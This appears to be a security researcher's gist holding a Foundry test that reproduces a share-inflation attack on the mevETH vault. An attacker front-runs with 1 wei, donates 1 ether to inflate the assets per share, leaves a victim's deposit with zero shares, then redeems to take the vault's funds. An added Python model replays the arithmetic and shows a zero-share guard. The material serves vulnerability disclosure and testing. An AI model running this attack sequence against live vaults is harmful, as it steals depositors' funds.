@okkothejawa
Last active September 11, 2023 19:38
creamy inflation attack

PATCH THE REDEEMCREAM TRANSFER TO 0 BUG BEFORE RUNNING THIS. APPEND THIS TO ERC4626FULLTEST.

function testCreamyInflationAttack() public {
        address cream = 0x49D72e3973900A195A155a46441F0C08179FdB64;
        uint256 creamAmount = 1; // 1 wei
        // give 1 wei of cream to attacker, and 1 whole ether
        deal(cream, User01, creamAmount);
        vm.deal(User01, 1 ether);
        // attacker needs to dump the creamAmount so the last redeem doesn't revert;
        // can be done in practice with selfdestruct to dump native ether directly,
        // as fallback is access controlled and grantRewards inflates fraction.elastic,
        // which we don't want at this step
        vm.deal(address(mevEth), creamAmount);

        vm.startPrank(User01); // attacker frontruns
        ERC20(cream).approve(address(mevEth), creamAmount);
        mevEth.redeemCream(creamAmount);

        assertEq(mevEth.balanceOf(User01), creamAmount);

        // dump 1 ether to inflate `fraction.elastic`
        mevEth.grantRewards{ value: 1 ether }();

        vm.startPrank(User02); // victim deposits 1 ether
        mevEth.deposit{ value: 1 ether }(1 ether, User02);
        assertEq(mevEth.balanceOf(User02), 0);

        vm.startPrank(User01); // attacker sandwiches the victim

        mevEth.redeem(mevEth.balanceOf(User01), User01, User01); // redeems all of their shares
        assertEq(weth.balanceOf(User01), 2 ether + 1 wei); // attacker steals victim's funds
        assertEq(address(mevEth).balance, 0); // assert all funds are stolen from meveth
    }
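
The share arithmetic this test relies on, modelled in Python as an added example (not part of the original gist or the mevETH code base). It assumes floor-division conversion between `elastic` (assets) and `base` (shares), uses a plain 1 wei deposit to stand in for `redeemCream`, and the `reject_zero_shares` guard is a hypothetical mitigation shown for comparison.

```python
# Added model (not the project's code): floor-division share math assumed to
# mirror the elastic/base accounting that the test above exercises.
WEI = 1
ETHER = 10**18


class VaultModel:
    """Minimal vault: `elastic` = total assets, `base` = total shares."""

    def __init__(self, reject_zero_shares=False):
        self.elastic = 0
        self.base = 0
        self.shares = {}
        self.reject_zero_shares = reject_zero_shares  # hypothetical guard flag

    def deposit(self, who, assets):
        # First deposit mints 1:1; later deposits round down.
        minted = assets if self.base == 0 else assets * self.base // self.elastic
        if self.reject_zero_shares and minted == 0:
            raise ValueError("deposit would mint zero shares")
        self.elastic += assets
        self.base += minted
        self.shares[who] = self.shares.get(who, 0) + minted
        return minted

    def grant_rewards(self, assets):
        # Raises assets per share without minting shares.
        self.elastic += assets

    def redeem_all(self, who):
        burned = self.shares.pop(who, 0)
        paid = burned * self.elastic // self.base if self.base else 0
        self.elastic -= paid
        self.base -= burned
        return paid


def run_sequence(reject_zero_shares):
    """Replay the test's steps; return (victim_shares, attacker_payout)."""
    v = VaultModel(reject_zero_shares)
    v.deposit("User01", 1 * WEI)       # stands in for redeemCream(1 wei)
    v.grant_rewards(1 * ETHER)         # elastic = 1 ether + 1 wei, base = 1
    try:
        victim = v.deposit("User02", 1 * ETHER)
    except ValueError:
        victim = None                  # guarded vault refuses the deposit
    return victim, v.redeem_all("User01")
```

Without the guard the victim's 1 ether mints 0 shares and the single outstanding share redeems for 2 ether + 1 wei, matching the test's assertions; with the guard the deposit is refused and User01 only recovers their own 1 ether + 1 wei.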